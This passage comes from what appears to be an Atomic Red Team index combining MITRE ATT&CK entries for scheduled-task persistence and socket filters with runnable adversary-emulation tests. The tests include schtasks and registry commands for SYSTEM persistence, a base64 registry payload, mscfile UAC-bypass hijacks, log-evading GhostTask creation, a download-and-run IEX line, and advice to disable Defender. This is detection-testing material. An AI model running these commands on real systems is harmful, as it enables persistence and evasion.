url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
- source_name: TechNet Scheduled Task Events
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
- source_name: Malicious Life by Cybereason
description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: TechNet Forum Scheduled Task Operational Setting
description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention
settings. Retrieved December 12, 2017.
url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:36.495Z'
name: 'Scheduled Task/Job: At'
description: |-
Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
x_mitre_version: '2.4'
identifier: T1053.002
atomic_tests:
- name: At.exe Scheduled task
auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8
description: |
Executes cmd.exe
Note: deprecated in Windows 8+
Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: 'at 13:20 /interactive cmd
'
- name: At - Schedule a job
auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e
description: 'This test submits a command to be run in the future by the `at`
daemon.
'
supported_platforms:
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependency_executor_name: sh
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
'
prereq_command: 'if [ "$(uname)" = ''FreeBSD'' ]; then which at; else which
at && which atd; fi;
'
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
'
- description: 'The `atd` daemon must be running
'
prereq_command: 'if [ $(uname) = ''Linux'' ]; then systemctl status atd ||
service atd status; fi;
'
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
'
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}'
- name: At - Schedule a job via kubectl in a Pod
auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
description: |
Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
and submits a job with `at`. The pod is deleted after execution.
supported_platforms:
- containers
input_arguments:
image_name:
description: Name of the image
type: string
default: ubuntu
pod_name:
description: K8s pod name to execute the command in
type: string
default: atomic-at-schedule
time_spec:
description: Time specification of when the command should run
type: string
default: now + 1 minute
at_command:
description: The command to be run
type: string
default: echo Hello from Atomic Red Team
dependencies:
- description: kubectl must be installed and configured
get_prereq_command: 'echo "kubectl must be installed manually"
'
prereq_command: 'which kubectl
'
executor:
name: bash
elevation_required: false
command: 'kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach
--rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install
-y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo ''#{at_command}''
| at #{time_spec} && at -l"
'
persistence:
T1053.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9
created: '2019-11-27T14:58:00.429Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/005
external_id: T1053.005
- source_name: ProofPoint Serpent
description: Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New
Backdoor Targets French Entities with Unique Attack Chain. Retrieved April
11, 2022.
url: https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
- source_name: Defending Against Scheduled Task Attacks in Windows Environments
description: Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled
Tasks. Retrieved July 5, 2022.
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
September 12, 2024.
url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
Retrieved June 1, 2022.
url: https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
- source_name: TechNet Scheduled Task Events
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
- source_name: Red Canary - Atomic Red Team
description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
Task/Job: Scheduled Task. Retrieved June 19, 2024.'
url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- source_name: TechNet Forum Scheduled Task Operational Setting
description: Satyajit321. (2015, November 3). Scheduled Tasks History Retention
settings. Retrieved December 12, 2017.
url: https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen
- source_name: SigmaHQ
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
- source_name: Stack Overflow
description: Stack Overflow. (n.d.). How to find the location of the Scheduled
Tasks folder. Retrieved June 19, 2024.
url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.176Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
wrapper for the Windows Task Scheduler, and alternatively, adversaries have
used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
(WMI) to create a scheduled task. Adversaries may also utilize the Powershell
Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
system startup or on a scheduled basis for persistence. The Windows Task Scheduler
can also be abused to conduct remote Execution as part of Lateral Movement
and/or to run a process under the context of a specified account (such as
SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible
to defender tools and manual queries used to enumerate tasks. Specifically,
an adversary may hide a task from `schtasks /query` and the Task Scheduler
by deleting the associated Security Descriptor (SD) registry value (where
deletion of this value must be completed using SYSTEM permissions).(Citation:
SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate
methods to hide tasks, such as altering the metadata (e.g., `Index` value)
within associated registry keys.(Citation: Defending Against Scheduled Task
Attacks in Windows Environments) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Andrew Northern, @ex_raritas
- Bryan Campbell, @bry_campbell
- Selena Larson, @selenalarson
- Sittikorn Sangrattanapitak
- Zachary Abzug, @ZackDoesML
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.8'
x_mitre_remote_support: false
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2
description: |
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
supported_platforms:
- windows
executor:
command: |
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
cleanup_command: |
schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1
schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Scheduled task Local
auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
'
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: string
default: '20:10'
executor:
name: command_prompt
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: string
default: '20:10'
target:
description: Target
type: string
default: localhost
user_name:
description: 'Username to authenticate with, format: DOMAIN\User'
type: string
default: DOMAIN\user
password:
description: Password to authenticate with
type: string
default: At0micStrong
executor:
name: command_prompt
elevation_required: true
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
cleanup_command: 'Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
'
- name: WMI Invoke-CimMethod Scheduled Task
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
description: 'Create an scheduled task that executes notepad.exe after user
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
'
supported_platforms:
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{xml_path})
'
prereq_command: 'if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
command: |
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
'
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
127.0.0.1) and then a scheduled task will be created.\nThe scheduled task
will launch powershell to decode and run the command in the registry daily.\nThis
is a persistence mechanism recently seen in use by Qakbot. \n\n[Additiona
Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n"
supported_platforms:
- windows
input_arguments:
time:
description: Daily scheduled task execution time
type: string
default: '07:45'
executor:
command: |
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
cleanup_command: |
schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
name: command_prompt
- name: Import XML Schedule Task with Hidden Attribute
auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
description: "Create an scheduled task that executes calc.exe after user login
from XML that contains hidden setting attribute. \nThis technique was seen
several times in tricbot malware and also with the targetted attack campaigne
the industroyer2.\n"
supported_platforms:
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{xml_path})
'
prereq_command: 'if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
command: |
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
cleanup_command: 'Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false
>$null 2>&1
'
- name: PowerShell Modify A Scheduled Task
auto_generated_guid: dda6fc7b-c9a6-4c18-b98d-95ec6542af6d
description: "Create a scheduled task with an action and modify the action to
do something else. The initial idea is to showcase Microsoft Windows TaskScheduler
Operational log modification of an action on a Task already registered. \nIt
will first be created to spawn cmd.exe, but modified to run notepad.exe.\n\nUpon
successful execution, powershell.exe will create a scheduled task and modify
the action. \n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false
>$null 2>&1
'
- name: Scheduled Task ("Ghost Task") via Registry Key Manipulation
auto_generated_guid: 704333ca-cc12-4bcf-9916-101844881f54
description: |
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.
This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.
For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-added task
type: string
default: lilghostie
task_command:
description: Command you want the task to execute
type: string
default: notepad.exe
target:
description: System where the task should run
type: string
default: localhost
user_name:
description: Username to authenticate with, such as ATOMICDOMAIN\AtomicAdmin
type: string
default: "$env:USERDOMAIN + '\\' + $env:USERNAME"
dependency_executor_name: powershell
dependencies:
- description: 'PsExec tool from Sysinternals must exist in the ExternalPayloads
directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
- description: 'GhostTask.exe tool from netero101 must exist in the ExternalPayloads
directory. This tool may be quarantined by windows defender; disable windows
defender real-time protection to fix it or add the ExternalPayloads directory
as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"`
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe"
executor:
name: command_prompt
elevation_required: true
command: |
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
cleanup_command: |
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
- name: Scheduled Task Persistence via CompMgmt.msc
auto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2
description: "Adds persistence by abusing `compmgmt.msc` via a scheduled task.\nWhen
the Computer Management console is opened, it will run a malicious payload
(in this case, `calc.exe`). \nThis technique abuses scheduled tasks and registry
modifications to hijack legitimate system processes.\n"
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-created scheduled task
type: string
default: CompMgmtBypass
payload:
description: Command you want the task to execute
type: string
default: calc.exe
executor:
name: command_prompt
elevation_required: true
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
schtasks /Delete /TN "#{task_name}" /F
- name: Scheduled Task Persistence via Eventviewer.msc
auto_generated_guid: 02124c37-767e-4b76-9383-c9fc366d9d4c
description: "Adds persistence by abusing `eventviewer.msc` via a scheduled
task.\nWhen the eventviewer console is opened, it will run a malicious payload
(in this case, `calc.exe`). \n"
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-created scheduled task
type: string
default: EventViewerBypass
payload:
description: Command you want the task to execute
type: string
default: calc.exe
executor:
name: command_prompt
elevation_required: true
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
schtasks /Delete /TN "#{task_name}" /F
T1205.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520
created: '2022-09-30T21:18:41.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1205/002
external_id: T1205.002
- source_name: exatrack bpf filters passive backdoors
description: 'ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of
a passive backdoor. Retrieved October 18, 2022.'
url: https://exatrack.com/public/Tricephalic_Hellkeeper.pdf
- source_name: crowdstrike bpf socket filters
description: 'Jamie Harries. (2022, May 25). Hunting a Global Telecommunications
Threat: DecisiveArchitect and Its Custom Implant JustForFun. Retrieved October
18, 2022.'
url: https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/
- source_name: Leonardo Turla Penquin May 2020
description: Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”.
Retrieved March 11, 2021.
url: https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf
- source_name: haking9 libpcap network sniffing
description: 'Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008
Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.'
url: http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.274Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)
Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tim (Wadhwa-)Brown
- CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1037:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
created: '2017-05-31T21:30:38.910Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037
external_id: T1037
- source_name: Anomali Rocke March 2019
description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With
a New Malware Family Written in Golang. Retrieved April 24, 2019.
url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
- source_name: Mandiant APT29 Eye Spy Email Nov 22
description: 'Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved
August 17, 2023.'
url: https://www.mandiant.com/resources/blog/unc3524-eye-spy-email
object_marking_refs:
